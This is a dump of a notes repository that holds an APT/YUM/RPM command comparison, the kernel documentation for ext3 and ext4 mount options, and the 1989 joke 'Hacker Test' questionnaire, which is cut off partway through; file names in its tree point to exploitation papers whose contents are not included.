├── MallocMaleficarum.txt ├── Malloc_Des-Maleficarum.txt ├── Packaging.txt ├── Users.txt ├── Vudo_malloc_tricks.txt ├── ext3.txt ├── ext4.txt ├── hacktest.text ├── heaptut.txt ├── memory.txt ├── memorylayout.txt ├── memorymanagement.txt ├── ntfs.txt ├── ret2libc.txt └── unaligned-memory.txt /Malloc_Des-Maleficarum.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Malformation/Notes/73e7b03526bb37f5b484c0bc6cd03caab8d1eb20/Malloc_Des-Maleficarum.txt -------------------------------------------------------------------------------- /Packaging.txt: -------------------------------------------------------------------------------- 1 | Command APT YUM RPM 2 | Meaning Advanced Package Tool Yellow dog (Linux) Updater, Modified Red Hat Package Manager 3 | File Extension *.deb *.rpm *.rpm 4 | (Remote) Repository location config /etc/apt/sources.list /etc/yum.conf N/A 5 | Update package index or header files from remote sources aptitude update (apt-list update) N/A (yum does this every time it's run, use -C to avoid this slow behavior) N/A 6 | Install new packages aptitude install [args] yum install [args] rpm -Uvh [args] 7 | Remove packages aptitude remove [args] yum remove [args] rpm -e [args] 8 | Find packages that you can install apt-cache search [args] yum search [args] N/A 9 | Show information about a package that is not installed [1] apt-cache show [args] yum list [args] rpm -qip [args] 10 | Show information about an installed package apt-cache show [args] yum info [args] rpm -qi [args] 11 | List the contents (files) of a package that is not installed [1] dpkg -L [args] (apt-file show [args]) rpm -qlp [args] 12 | List the contents (files) of an installed package dpkg -L [args] (apt-file show [args]) rpm -ql [args] 13 | Check for upgrades aptitude -s upgrade apt-get -s dist-upgrade yum check-update N/A 14 | Upgrade packages aptitude dist-upgrade yum update rpm -Uvh [args] 15 | Upgrade entire system aptitude dist-upgrade yum upgrade N/A 16 | Show the package to which a file belongs dpkg-query -S (apt-file search ) yum provides yum whatprovides rpm -q --whatprovides 17 | Remove packages from the local cache directory aptitude clean yum clean packages N/A 18 | Remove only obsolete packages from the local cache directory aptitude autoclean N/A N/A 19 | Remove header files from the local cache directory, forcing a new download of same on next use apt-file purge yum clean headers N/A 20 | Remove obsolete header files from the local cache directory N/A yum clean oldheaders N/A 21 | Run yum clean packages and yum clean oldheaders N/A yum clean all N/A 22 | Show stats about the package cache apt-cache stats 23 | Show the packages a given package depends on apt-cache depends 24 | Show other packages that depend on a given package (reverse dependency) apt-cache rdepends rpm -q -whatrequires [args] 25 | Show information about the packages apt-cache showpkg [args] 26 | Show the names, version and other information for all installed packages dpkg -l rpm -qa 27 | Verify all installed packages debsums rpm -Va 28 | Show what has been changed in a new version of a package apt-listchanges rpm -q -changelog [args] 29 | Lists available package versions with distribution apt-show-versions 30 | Query the package database dpkg-query rpm -q 31 | Show the list of all the packages in the cache apt-cache pkgnames 32 | -------------------------------------------------------------------------------- /ext3.txt: -------------------------------------------------------------------------------- 1 | 2 | Ext3 Filesystem 3 | =============== 4 | 5 | Ext3 was originally released in September 1999. Written by Stephen Tweedie 6 | for the 2.2 branch, and ported to 2.4 kernels by Peter Braam, Andreas Dilger, 7 | Andrew Morton, Alexander Viro, Ted Ts'o and Stephen Tweedie. 8 | 9 | Ext3 is the ext2 filesystem enhanced with journalling capabilities. 10 | 11 | Options 12 | ======= 13 | 14 | When mounting an ext3 filesystem, the following option are accepted: 15 | (*) == default 16 | 17 | journal=update Update the ext3 file system's journal to the current 18 | format. 19 | 20 | journal=inum When a journal already exists, this option is ignored. 21 | Otherwise, it specifies the number of the inode which 22 | will represent the ext3 file system's journal file. 23 | 24 | journal_dev=devnum When the external journal device's major/minor numbers 25 | have changed, this option allows the user to specify 26 | the new journal location. The journal device is 27 | identified through its new major/minor numbers encoded 28 | in devnum. 29 | 30 | noload Don't load the journal on mounting. 31 | 32 | data=journal All data are committed into the journal prior to being 33 | written into the main file system. 34 | 35 | data=ordered (*) All data are forced directly out to the main file 36 | system prior to its metadata being committed to the 37 | journal. 38 | 39 | data=writeback Data ordering is not preserved, data may be written 40 | into the main file system after its metadata has been 41 | committed to the journal. 42 | 43 | commit=nrsec (*) Ext3 can be told to sync all its data and metadata 44 | every 'nrsec' seconds. The default value is 5 seconds. 45 | This means that if you lose your power, you will lose 46 | as much as the latest 5 seconds of work (your 47 | filesystem will not be damaged though, thanks to the 48 | journaling). This default value (or any low value) 49 | will hurt performance, but it's good for data-safety. 50 | Setting it to 0 will have the same effect as leaving 51 | it at the default (5 seconds). 52 | Setting it to very large values will improve 53 | performance. 54 | 55 | barrier=1 This enables/disables barriers. barrier=0 disables 56 | it, barrier=1 enables it. 57 | 58 | orlov (*) This enables the new Orlov block allocator. It is 59 | enabled by default. 60 | 61 | oldalloc This disables the Orlov block allocator and enables 62 | the old block allocator. Orlov should have better 63 | performance - we'd like to get some feedback if it's 64 | the contrary for you. 65 | 66 | user_xattr Enables Extended User Attributes. Additionally, you 67 | need to have extended attribute support enabled in the 68 | kernel configuration (CONFIG_EXT3_FS_XATTR). See the 69 | attr(5) manual page and http://acl.bestbits.at/ to 70 | learn more about extended attributes. 71 | 72 | nouser_xattr Disables Extended User Attributes. 73 | 74 | acl Enables POSIX Access Control Lists support. 75 | Additionally, you need to have ACL support enabled in 76 | the kernel configuration (CONFIG_EXT3_FS_POSIX_ACL). 77 | See the acl(5) manual page and http://acl.bestbits.at/ 78 | for more information. 79 | 80 | noacl This option disables POSIX Access Control List 81 | support. 82 | 83 | reservation 84 | 85 | noreservation 86 | 87 | bsddf (*) Make 'df' act like BSD. 88 | minixdf Make 'df' act like Minix. 89 | 90 | check=none Don't do extra checking of bitmaps on mount. 91 | nocheck 92 | 93 | debug Extra debugging information is sent to syslog. 94 | 95 | errors=remount-ro(*) Remount the filesystem read-only on an error. 96 | errors=continue Keep going on a filesystem error. 97 | errors=panic Panic and halt the machine if an error occurs. 98 | 99 | grpid Give objects the same group ID as their creator. 100 | bsdgroups 101 | 102 | nogrpid (*) New objects have the group ID of their creator. 103 | sysvgroups 104 | 105 | resgid=n The group ID which may use the reserved blocks. 106 | 107 | resuid=n The user ID which may use the reserved blocks. 108 | 109 | sb=n Use alternate superblock at this location. 110 | 111 | quota 112 | noquota 113 | grpquota 114 | usrquota 115 | 116 | bh (*) ext3 associates buffer heads to data pages to 117 | nobh (a) cache disk block mapping information 118 | (b) link pages into transaction to provide 119 | ordering guarantees. 120 | "bh" option forces use of buffer heads. 121 | "nobh" option tries to avoid associating buffer 122 | heads (supported only for "writeback" mode). 123 | 124 | 125 | Specification 126 | ============= 127 | Ext3 shares all disk implementation with the ext2 filesystem, and adds 128 | transactions capabilities to ext2. Journaling is done by the Journaling Block 129 | Device layer. 130 | 131 | Journaling Block Device layer 132 | ----------------------------- 133 | The Journaling Block Device layer (JBD) isn't ext3 specific. It was designed 134 | to add journaling capabilities to a block device. The ext3 filesystem code 135 | will inform the JBD of modifications it is performing (called a transaction). 136 | The journal supports the transactions start and stop, and in case of a crash, 137 | the journal can replay the transactions to quickly put the partition back into 138 | a consistent state. 139 | 140 | Handles represent a single atomic update to a filesystem. JBD can handle an 141 | external journal on a block device. 142 | 143 | Data Mode 144 | --------- 145 | There are 3 different data modes: 146 | 147 | * writeback mode 148 | In data=writeback mode, ext3 does not journal data at all. This mode provides 149 | a similar level of journaling as that of XFS, JFS, and ReiserFS in its default 150 | mode - metadata journaling. A crash+recovery can cause incorrect data to 151 | appear in files which were written shortly before the crash. This mode will 152 | typically provide the best ext3 performance. 153 | 154 | * ordered mode 155 | In data=ordered mode, ext3 only officially journals metadata, but it logically 156 | groups metadata and data blocks into a single unit called a transaction. When 157 | it's time to write the new metadata out to disk, the associated data blocks 158 | are written first. In general, this mode performs slightly slower than 159 | writeback but significantly faster than journal mode. 160 | 161 | * journal mode 162 | data=journal mode provides full data and metadata journaling. All new data is 163 | written to the journal first, and then to its final location. 164 | In the event of a crash, the journal can be replayed, bringing both data and 165 | metadata into a consistent state. This mode is the slowest except when data 166 | needs to be read from and written to disk at the same time where it 167 | outperforms all other modes. 168 | 169 | Compatibility 170 | ------------- 171 | 172 | Ext2 partitions can be easily convert to ext3, with `tune2fs -j `. 173 | Ext3 is fully compatible with Ext2. Ext3 partitions can easily be mounted as 174 | Ext2. 175 | 176 | 177 | External Tools 178 | ============== 179 | See manual pages to learn more. 180 | 181 | tune2fs: create a ext3 journal on a ext2 partition with the -j flag. 182 | mke2fs: create a ext3 partition with the -j flag. 183 | debugfs: ext2 and ext3 file system debugger. 184 | ext2online: online (mounted) ext2 and ext3 filesystem resizer 185 | 186 | 187 | References 188 | ========== 189 | 190 | kernel source: 191 | 192 | 193 | programs: http://e2fsprogs.sourceforge.net/ 194 | http://ext2resize.sourceforge.net 195 | 196 | useful links: http://www.zip.com.au/~akpm/linux/ext3/ext3-usage.html 197 | http://www-106.ibm.com/developerworks/linux/library/l-fs7/ 198 | http://www-106.ibm.com/developerworks/linux/library/l-fs8/ 199 | -------------------------------------------------------------------------------- /ext4.txt: -------------------------------------------------------------------------------- 1 | Ext4 Filesystem 2 | =============== 3 | 4 | Ext4 is an an advanced level of the ext3 filesystem which incorporates 5 | scalability and reliability enhancements for supporting large filesystems 6 | (64 bit) in keeping with increasing disk capacities and state-of-the-art 7 | feature requirements. 8 | 9 | Mailing list: linux-ext4[AT]vger.kernel[DOT]org 10 | Web site: http://ext4.wiki.kernel.org 11 | 12 | 13 | 1. Quick usage instructions: 14 | =========================== 15 | 16 | Note: More extensive information for getting started with ext4 can be 17 | found at the ext4 wiki site at the URL: 18 | http://ext4.wiki.kernel.org/index.php/Ext4_Howto 19 | 20 | - Compile and install the latest version of e2fsprogs (as of this 21 | writing version 1.41.3) from: 22 | 23 | http://sourceforge.net/project/showfiles.php?group_id=2406 24 | 25 | or 26 | 27 | ftp://ftp.kernel.org/pub/linux/kernel/people/tytso/e2fsprogs/ 28 | 29 | or grab the latest git repository from: 30 | 31 | git://git.kernel.org/pub/scm/fs/ext2/e2fsprogs.git 32 | 33 | - Note that it is highly important to install the mke2fs.conf file 34 | that comes with the e2fsprogs 1.41.x sources in /etc/mke2fs.conf. If 35 | you have edited the /etc/mke2fs.conf file installed on your system, 36 | you will need to merge your changes with the version from e2fsprogs 37 | 1.41.x. 38 | 39 | - Create a new filesystem using the ext4 filesystem type: 40 | 41 | # mke2fs -t ext4 /dev/hda1 42 | 43 | Or to configure an existing ext3 filesystem to support extents: 44 | 45 | # tune2fs -O extents /dev/hda1 46 | 47 | If the filesystem was created with 128 byte inodes, it can be 48 | converted to use 256 byte for greater efficiency via: 49 | 50 | # tune2fs -I 256 /dev/hda1 51 | 52 | (Note: we currently do not have tools to convert an ext4 53 | filesystem back to ext3; so please do not do try this on production 54 | filesystems.) 55 | 56 | - Mounting: 57 | 58 | # mount -t ext4 /dev/hda1 /wherever 59 | 60 | - When comparing performance with other filesystems, it's always 61 | important to try multiple workloads; very often a subtle change in a 62 | workload parameter can completely change the ranking of which 63 | filesystems do well compared to others. When comparing versus ext3, 64 | note that ext4 enables write barriers by default, while ext3 does 65 | not enable write barriers by default. So it is useful to use 66 | explicitly specify whether barriers are enabled or not when via the 67 | '-o barriers=[0|1]' mount option for both ext3 and ext4 filesystems 68 | for a fair comparison. When tuning ext3 for best benchmark numbers, 69 | it is often worthwhile to try changing the data journaling mode; '-o 70 | data=writeback,nobh' can be faster for some workloads. (Note 71 | however that running mounted with data=writeback can potentially 72 | leave stale data exposed in recently written files in case of an 73 | unclean shutdown, which could be a security exposure in some 74 | situations.) Configuring the filesystem with a large journal can 75 | also be helpful for metadata-intensive workloads. 76 | 77 | 2. Features 78 | =========== 79 | 80 | 2.1 Currently available 81 | 82 | * ability to use filesystems > 16TB (e2fsprogs support not available yet) 83 | * extent format reduces metadata overhead (RAM, IO for access, transactions) 84 | * extent format more robust in face of on-disk corruption due to magics, 85 | * internal redundancy in tree 86 | * improved file allocation (multi-block alloc) 87 | * lift 32000 subdirectory limit imposed by i_links_count[1] 88 | * nsec timestamps for mtime, atime, ctime, create time 89 | * inode version field on disk (NFSv4, Lustre) 90 | * reduced e2fsck time via uninit_bg feature 91 | * journal checksumming for robustness, performance 92 | * persistent file preallocation (e.g for streaming media, databases) 93 | * ability to pack bitmaps and inode tables into larger virtual groups via the 94 | flex_bg feature 95 | * large file support 96 | * Inode allocation using large virtual block groups via flex_bg 97 | * delayed allocation 98 | * large block (up to pagesize) support 99 | * efficent new ordered mode in JBD2 and ext4(avoid using buffer head to force 100 | the ordering) 101 | 102 | [1] Filesystems with a block size of 1k may see a limit imposed by the 103 | directory hash tree having a maximum depth of two. 104 | 105 | 2.2 Candidate features for future inclusion 106 | 107 | * Online defrag (patches available but not well tested) 108 | * reduced mke2fs time via lazy itable initialization in conjuction with 109 | the uninit_bg feature (capability to do this is available in e2fsprogs 110 | but a kernel thread to do lazy zeroing of unused inode table blocks 111 | after filesystem is first mounted is required for safety) 112 | 113 | There are several others under discussion, whether they all make it in is 114 | partly a function of how much time everyone has to work on them. Features like 115 | metadata checksumming have been discussed and planned for a bit but no patches 116 | exist yet so I'm not sure they're in the near-term roadmap. 117 | 118 | The big performance win will come with mballoc, delalloc and flex_bg 119 | grouping of bitmaps and inode tables. Some test results available here: 120 | 121 | - http://www.bullopensource.org/ext4/20080818-ffsb/ffsb-write-2.6.27-rc1.html 122 | - http://www.bullopensource.org/ext4/20080818-ffsb/ffsb-readwrite-2.6.27-rc1.html 123 | 124 | 3. Options 125 | ========== 126 | 127 | When mounting an ext4 filesystem, the following option are accepted: 128 | (*) == default 129 | 130 | ro Mount filesystem read only. Note that ext4 will 131 | replay the journal (and thus write to the 132 | partition) even when mounted "read only". The 133 | mount options "ro,noload" can be used to prevent 134 | writes to the filesystem. 135 | 136 | journal_checksum Enable checksumming of the journal transactions. 137 | This will allow the recovery code in e2fsck and the 138 | kernel to detect corruption in the kernel. It is a 139 | compatible change and will be ignored by older kernels. 140 | 141 | journal_async_commit Commit block can be written to disk without waiting 142 | for descriptor blocks. If enabled older kernels cannot 143 | mount the device. This will enable 'journal_checksum' 144 | internally. 145 | 146 | journal=update Update the ext4 file system's journal to the current 147 | format. 148 | 149 | journal_dev=devnum When the external journal device's major/minor numbers 150 | have changed, this option allows the user to specify 151 | the new journal location. The journal device is 152 | identified through its new major/minor numbers encoded 153 | in devnum. 154 | 155 | norecovery Don't load the journal on mounting. Note that 156 | noload if the filesystem was not unmounted cleanly, 157 | skipping the journal replay will lead to the 158 | filesystem containing inconsistencies that can 159 | lead to any number of problems. 160 | 161 | data=journal All data are committed into the journal prior to being 162 | written into the main file system. 163 | 164 | data=ordered (*) All data are forced directly out to the main file 165 | system prior to its metadata being committed to the 166 | journal. 167 | 168 | data=writeback Data ordering is not preserved, data may be written 169 | into the main file system after its metadata has been 170 | committed to the journal. 171 | 172 | commit=nrsec (*) Ext4 can be told to sync all its data and metadata 173 | every 'nrsec' seconds. The default value is 5 seconds. 174 | This means that if you lose your power, you will lose 175 | as much as the latest 5 seconds of work (your 176 | filesystem will not be damaged though, thanks to the 177 | journaling). This default value (or any low value) 178 | will hurt performance, but it's good for data-safety. 179 | Setting it to 0 will have the same effect as leaving 180 | it at the default (5 seconds). 181 | Setting it to very large values will improve 182 | performance. 183 | 184 | barrier=<0|1(*)> This enables/disables the use of write barriers in 185 | barrier(*) the jbd code. barrier=0 disables, barrier=1 enables. 186 | nobarrier This also requires an IO stack which can support 187 | barriers, and if jbd gets an error on a barrier 188 | write, it will disable again with a warning. 189 | Write barriers enforce proper on-disk ordering 190 | of journal commits, making volatile disk write caches 191 | safe to use, at some performance penalty. If 192 | your disks are battery-backed in one way or another, 193 | disabling barriers may safely improve performance. 194 | The mount options "barrier" and "nobarrier" can 195 | also be used to enable or disable barriers, for 196 | consistency with other ext4 mount options. 197 | 198 | inode_readahead_blks=n This tuning parameter controls the maximum 199 | number of inode table blocks that ext4's inode 200 | table readahead algorithm will pre-read into 201 | the buffer cache. The default value is 32 blocks. 202 | 203 | orlov (*) This enables the new Orlov block allocator. It is 204 | enabled by default. 205 | 206 | oldalloc This disables the Orlov block allocator and enables 207 | the old block allocator. Orlov should have better 208 | performance - we'd like to get some feedback if it's 209 | the contrary for you. 210 | 211 | user_xattr Enables Extended User Attributes. Additionally, you 212 | need to have extended attribute support enabled in the 213 | kernel configuration (CONFIG_EXT4_FS_XATTR). See the 214 | attr(5) manual page and http://acl.bestbits.at/ to 215 | learn more about extended attributes. 216 | 217 | nouser_xattr Disables Extended User Attributes. 218 | 219 | acl Enables POSIX Access Control Lists support. 220 | Additionally, you need to have ACL support enabled in 221 | the kernel configuration (CONFIG_EXT4_FS_POSIX_ACL). 222 | See the acl(5) manual page and http://acl.bestbits.at/ 223 | for more information. 224 | 225 | noacl This option disables POSIX Access Control List 226 | support. 227 | 228 | reservation 229 | 230 | noreservation 231 | 232 | bsddf (*) Make 'df' act like BSD. 233 | minixdf Make 'df' act like Minix. 234 | 235 | debug Extra debugging information is sent to syslog. 236 | 237 | abort Simulate the effects of calling ext4_abort() for 238 | debugging purposes. This is normally used while 239 | remounting a filesystem which is already mounted. 240 | 241 | errors=remount-ro Remount the filesystem read-only on an error. 242 | errors=continue Keep going on a filesystem error. 243 | errors=panic Panic and halt the machine if an error occurs. 244 | (These mount options override the errors behavior 245 | specified in the superblock, which can be configured 246 | using tune2fs) 247 | 248 | data_err=ignore(*) Just print an error message if an error occurs 249 | in a file data buffer in ordered mode. 250 | data_err=abort Abort the journal if an error occurs in a file 251 | data buffer in ordered mode. 252 | 253 | grpid Give objects the same group ID as their creator. 254 | bsdgroups 255 | 256 | nogrpid (*) New objects have the group ID of their creator. 257 | sysvgroups 258 | 259 | resgid=n The group ID which may use the reserved blocks. 260 | 261 | resuid=n The user ID which may use the reserved blocks. 262 | 263 | sb=n Use alternate superblock at this location. 264 | 265 | quota These options are ignored by the filesystem. They 266 | noquota are used only by quota tools to recognize volumes 267 | grpquota where quota should be turned on. See documentation 268 | usrquota in the quota-tools package for more details 269 | (http://sourceforge.net/projects/linuxquota). 270 | 271 | jqfmt= These options tell filesystem details about quota 272 | usrjquota= so that quota information can be properly updated 273 | grpjquota= during journal replay. They replace the above 274 | quota options. See documentation in the quota-tools 275 | package for more details 276 | (http://sourceforge.net/projects/linuxquota). 277 | 278 | bh (*) ext4 associates buffer heads to data pages to 279 | nobh (a) cache disk block mapping information 280 | (b) link pages into transaction to provide 281 | ordering guarantees. 282 | "bh" option forces use of buffer heads. 283 | "nobh" option tries to avoid associating buffer 284 | heads (supported only for "writeback" mode). 285 | 286 | stripe=n Number of filesystem blocks that mballoc will try 287 | to use for allocation size and alignment. For RAID5/6 288 | systems this should be the number of data 289 | disks * RAID chunk size in file system blocks. 290 | 291 | delalloc (*) Defer block allocation until just before ext4 292 | writes out the block(s) in question. This 293 | allows ext4 to better allocation decisions 294 | more efficiently. 295 | nodelalloc Disable delayed allocation. Blocks are allocated 296 | when the data is copied from userspace to the 297 | page cache, either via the write(2) system call 298 | or when an mmap'ed page which was previously 299 | unallocated is written for the first time. 300 | 301 | max_batch_time=usec Maximum amount of time ext4 should wait for 302 | additional filesystem operations to be batch 303 | together with a synchronous write operation. 304 | Since a synchronous write operation is going to 305 | force a commit and then a wait for the I/O 306 | complete, it doesn't cost much, and can be a 307 | huge throughput win, we wait for a small amount 308 | of time to see if any other transactions can 309 | piggyback on the synchronous write. The 310 | algorithm used is designed to automatically tune 311 | for the speed of the disk, by measuring the 312 | amount of time (on average) that it takes to 313 | finish committing a transaction. Call this time 314 | the "commit time". If the time that the 315 | transaction has been running is less than the 316 | commit time, ext4 will try sleeping for the 317 | commit time to see if other operations will join 318 | the transaction. The commit time is capped by 319 | the max_batch_time, which defaults to 15000us 320 | (15ms). This optimization can be turned off 321 | entirely by setting max_batch_time to 0. 322 | 323 | min_batch_time=usec This parameter sets the commit time (as 324 | described above) to be at least min_batch_time. 325 | It defaults to zero microseconds. Increasing 326 | this parameter may improve the throughput of 327 | multi-threaded, synchronous workloads on very 328 | fast disks, at the cost of increasing latency. 329 | 330 | journal_ioprio=prio The I/O priority (from 0 to 7, where 0 is the 331 | highest priorty) which should be used for I/O 332 | operations submitted by kjournald2 during a 333 | commit operation. This defaults to 3, which is 334 | a slightly higher priority than the default I/O 335 | priority. 336 | 337 | auto_da_alloc(*) Many broken applications don't use fsync() when 338 | noauto_da_alloc replacing existing files via patterns such as 339 | fd = open("foo.new")/write(fd,..)/close(fd)/ 340 | rename("foo.new", "foo"), or worse yet, 341 | fd = open("foo", O_TRUNC)/write(fd,..)/close(fd). 342 | If auto_da_alloc is enabled, ext4 will detect 343 | the replace-via-rename and replace-via-truncate 344 | patterns and force that any delayed allocation 345 | blocks are allocated such that at the next 346 | journal commit, in the default data=ordered 347 | mode, the data blocks of the new file are forced 348 | to disk before the rename() operation is 349 | committed. This provides roughly the same level 350 | of guarantees as ext3, and avoids the 351 | "zero-length" problem that can happen when a 352 | system crashes before the delayed allocation 353 | blocks are forced to disk. 354 | 355 | discard Controls whether ext4 should issue discard/TRIM 356 | nodiscard(*) commands to the underlying block device when 357 | blocks are freed. This is useful for SSD devices 358 | and sparse/thinly-provisioned LUNs, but it is off 359 | by default until sufficient testing has been done. 360 | 361 | Data Mode 362 | ========= 363 | There are 3 different data modes: 364 | 365 | * writeback mode 366 | In data=writeback mode, ext4 does not journal data at all. This mode provides 367 | a similar level of journaling as that of XFS, JFS, and ReiserFS in its default 368 | mode - metadata journaling. A crash+recovery can cause incorrect data to 369 | appear in files which were written shortly before the crash. This mode will 370 | typically provide the best ext4 performance. 371 | 372 | * ordered mode 373 | In data=ordered mode, ext4 only officially journals metadata, but it logically 374 | groups metadata information related to data changes with the data blocks into a 375 | single unit called a transaction. When it's time to write the new metadata 376 | out to disk, the associated data blocks are written first. In general, 377 | this mode performs slightly slower than writeback but significantly faster than journal mode. 378 | 379 | * journal mode 380 | data=journal mode provides full data and metadata journaling. All new data is 381 | written to the journal first, and then to its final location. 382 | In the event of a crash, the journal can be replayed, bringing both data and 383 | metadata into a consistent state. This mode is the slowest except when data 384 | needs to be read from and written to disk at the same time where it 385 | outperforms all others modes. Currently ext4 does not have delayed 386 | allocation support if this data journalling mode is selected. 387 | 388 | References 389 | ========== 390 | 391 | kernel source: 392 | 393 | 394 | programs: http://e2fsprogs.sourceforge.net/ 395 | 396 | useful links: http://fedoraproject.org/wiki/ext3-devel 397 | http://www.bullopensource.org/ext4/ 398 | http://ext4.wiki.kernel.org/index.php/Main_Page 399 | http://fedoraproject.org/wiki/Features/Ext4 400 | 401 | 402 | -------------------------------------------------------------------------------- /hacktest.text: -------------------------------------------------------------------------------- 1 | From AMFPN@NEUVM1.BITNET Tue Oct 31 20:46:54 1989 2 | From: Per Nielsen 3 | Subject: Hacker test (was: Forwarded mail for FREETALK) 4 | 5 | 6 | 7 | 1 8 | 9 | 10 | THE HACKER TEST - Version 1.0 11 | 12 | 13 | Preface: 06.16.89 14 | 15 | This test was conceived and written by Felix Lee, John Hayes and Angela 16 | Thomas at the end of the spring semester, 1989. It has gone through 17 | many revisions prior to this initial release, and will undoubtedly go 18 | through many more. 19 | 20 | 21 | (Herewith a compendium of fact and folklore about computer hackerdom, 22 | cunningly disguised as a test.) 23 | 24 | 25 | Scoring - Count 1 for each item that you have done, or each 26 | question that you can answer correctly. 27 | 28 | 29 | If you score is between: You are 30 | 31 | 0x000 and 0x010 -> Computer Illiterate 32 | 0x011 and 0x040 -> a User 33 | 0x041 and 0x080 -> an Operator 34 | 0x081 and 0x0C0 -> a Nerd 35 | 0x0C1 and 0x100 -> a Hacker 36 | 0x101 and 0x180 -> a Guru 37 | 0x181 and 0x200 -> a Wizard 38 | 39 | Note: If you don't understand the scoring, stop here. 40 | 41 | 42 | And now for the questions... 43 | 44 | 45 | 0001 Have you ever used a computer? 46 | 0002 ... for more than 4 hours continuously? 47 | 0003 ... more than 8 hours? 48 | 0004 ... more than 16 hours? 49 | 0005 ... more than 32 hours? 50 | 51 | 0006 Have you ever patched paper tape? 52 | 53 | 0007 Have you ever missed a class while programming? 54 | 0008 ... Missed an examination? 55 | 0009 ... Missed a wedding? 56 | 0010 ... Missed your own wedding? 57 | 58 | 0011 Have you ever programmed while intoxicated? 59 | 0012 ... Did it make sense the next day? 60 | 61 | 0013 Have you ever written a flight simulator? 62 | 63 | 0014 Have you ever voided the warranty on your equipment? 64 | 65 | 0015 Ever change the value of 4? 66 | 0016 ... Unintentionally? 67 | 0017 ... In a language other than Fortran? 68 | 69 | 0018 Do you use DWIM to make life interesting? 70 | 71 | 0019 Have you named a computer? 72 | 73 | 0020 Do you complain when a "feature" you use gets fixed? 74 | 75 | 0021 Do you eat slime-molds? 76 | 77 | 0022 Do you know how many days old you are? 78 | 79 | 0023 Have you ever wanted to download pizza? 80 | 81 | 0024 Have you ever invented a computer joke? 82 | 0025 ... Did someone not 'get' it? 83 | 84 | 0026 Can you recite Jabberwocky? 85 | 0027 ... Backwards? 86 | 87 | 0028 Have you seen "Donald Duck in Mathemagic Land"? 88 | 89 | 0029 Have you seen "Tron"? 90 | 91 | 0030 Have you seen "Wargames"? 92 | 93 | 0031 Do you know what ASCII stands for? 94 | 0032 ... EBCDIC? 95 | 96 | 0033 Can you read and write ASCII in hex or octal? 97 | 0034 Do you know the names of all the ASCII control codes? 98 | 99 | 0035 Can you read and write EBCDIC in hex? 100 | 101 | 0036 Can you convert from EBCDIC to ASCII and vice versa? 102 | 103 | 0037 Do you know what characters are the same in both ASCII and EBCDIC? 104 | 105 | 0038 Do you know maxint on your system? 106 | 107 | 0039 Ever define your own numerical type to get better precision? 108 | 109 | 0040 Can you name powers of two up to 2**16 in arbitrary order? 110 | 0041 ... up to 2**32? 111 | 0042 ... up to 2**64? 112 | 113 | 0043 Can you read a punched card, looking at the holes? 114 | 0044 ... feeling the holes? 115 | 116 | 0045 Have you ever patched binary code? 117 | 0046 ... While the program was running? 118 | 119 | 0047 Have you ever used program overlays? 120 | 121 | 0048 Have you met any IBM vice-president? 122 | 0049 Do you know Dennis, Bill, or Ken? 123 | 124 | 0050 Have you ever taken a picture of a CRT? 125 | 0051 Have you ever played a videotape on your CRT? 126 | 127 | 0052 Have you ever digitized a picture? 128 | 129 | 0053 Did you ever forget to mount a scratch monkey? 130 | 131 | 0054 Have you ever optimized an idle loop? 132 | 133 | 0055 Did you ever optimize a bubble sort? 134 | 135 | 0056 Does your terminal/computer talk to you? 136 | 137 | 0057 Have you ever talked into an acoustic modem? 138 | 0058 ... Did it answer? 139 | 140 | 0059 Can you whistle 300 baud? 141 | 0060 ... 1200 baud? 142 | 143 | 0061 Can you whistle a telephone number? 144 | 145 | 0062 Have you witnessed a disk crash? 146 | 0063 Have you made a disk drive "walk"? 147 | 148 | 0064 Can you build a puffer train? 149 | 0065 ... Do you know what it is? 150 | 151 | 0066 Can you play music on your line printer? 152 | 0067 ... Your disk drive? 153 | 0068 ... Your tape drive? 154 | 155 | 0069 Do you have a Snoopy calendar? 156 | 0070 ... Is it out-of-date? 157 | 158 | 0071 Do you have a line printer picture of... 159 | 0072 ... the Mona Lisa? 160 | 0073 ... the Enterprise? 161 | 0074 ... Einstein? 162 | 0075 ... Oliver? 163 | 0076 Have you ever made a line printer picture? 164 | 165 | 0077 Do you know what the following stand for? 166 | 0078 ... DASD 167 | 0079 ... Emacs 168 | 0080 ... ITS 169 | 0081 ... RSTS/E 170 | 0082 ... SNA 171 | 0083 ... Spool 172 | 0084 ... TCP/IP 173 | 174 | Have you ever used 175 | 0085 ... TPU? 176 | 0086 ... TECO? 177 | 0087 ... Emacs? 178 | 0088 ... ed? 179 | 0089 ... vi? 180 | 0090 ... Xedit (in VM/CMS)? 181 | 0091 ... SOS? 182 | 0092 ... EDT? 183 | 0093 ... Wordstar? 184 | 185 | 0094 Have you ever written a CLIST? 186 | 187 | Have you ever programmed in 188 | 0095 ... the X windowing system? 189 | 0096 ... CICS? 190 | 191 | 0097 Have you ever received a Fax or a photocopy of a floppy? 192 | 193 | 0098 Have you ever shown a novice the "any" key? 194 | 0099 ... Was it the power switch? 195 | 196 | Have you ever attended 197 | 0100 ... Usenix? 198 | 0101 ... DECUS? 199 | 0102 ... SHARE? 200 | 0103 ... SIGGRAPH? 201 | 0104 ... NetCon? 202 | 203 | 0105 Have you ever participated in a standards group? 204 | 205 | 0106 Have you ever debugged machine code over the telephone? 206 | 207 | 0107 Have you ever seen voice mail? 208 | 0108 ... Can you read it? 209 | 210 | 0109 Do you solve word puzzles with an on-line dictionary? 211 | 212 | 0110 Have you ever taken a Turing test? 213 | 0111 ... Did you fail? 214 | 215 | 0112 Ever drop a card deck? 216 | 0113 ... Did you successfully put it back together? 217 | 0114 ... Without looking? 218 | 219 | 0115 Have you ever used IPCS? 220 | 221 | 0116 Have you ever received a case of beer with your computer? 222 | 223 | 0117 Does your computer come in 'designer' colors? 224 | 225 | 0118 Ever interrupted a UPS? 226 | 227 | 0119 Ever mask an NMI? 228 | 229 | 0120 Have you ever set off a Halon system? 230 | 0121 ... Intentionally? 231 | 0122 ... Do you still work there? 232 | 233 | 0123 Have you ever hit the emergency power switch? 234 | 0124 ... Intentionally? 235 | 236 | 0125 Do you have any defunct documentation? 237 | 0126 ... Do you still read it? 238 | 239 | 0127 Ever reverse-engineer or decompile a program? 240 | 0128 ... Did you find bugs in it? 241 | 242 | 0129 Ever help the person behind the counter with their terminal/computer? 243 | 244 | 0130 Ever tried rack mounting your telephone? 245 | 246 | 0131 Ever thrown a computer from more than two stories high? 247 | 248 | 0132 Ever patched a bug the vendor does not acknowledge? 249 | 250 | 0133 Ever fix a hardware problem in software? 251 | 0134 ... Vice versa? 252 | 253 | 0135 Ever belong to a user/support group? 254 | 255 | 0136 Ever been mentioned in Computer Recreations? 256 | 257 | 0137 Ever had your activities mentioned in the newspaper? 258 | 0138 ... Did 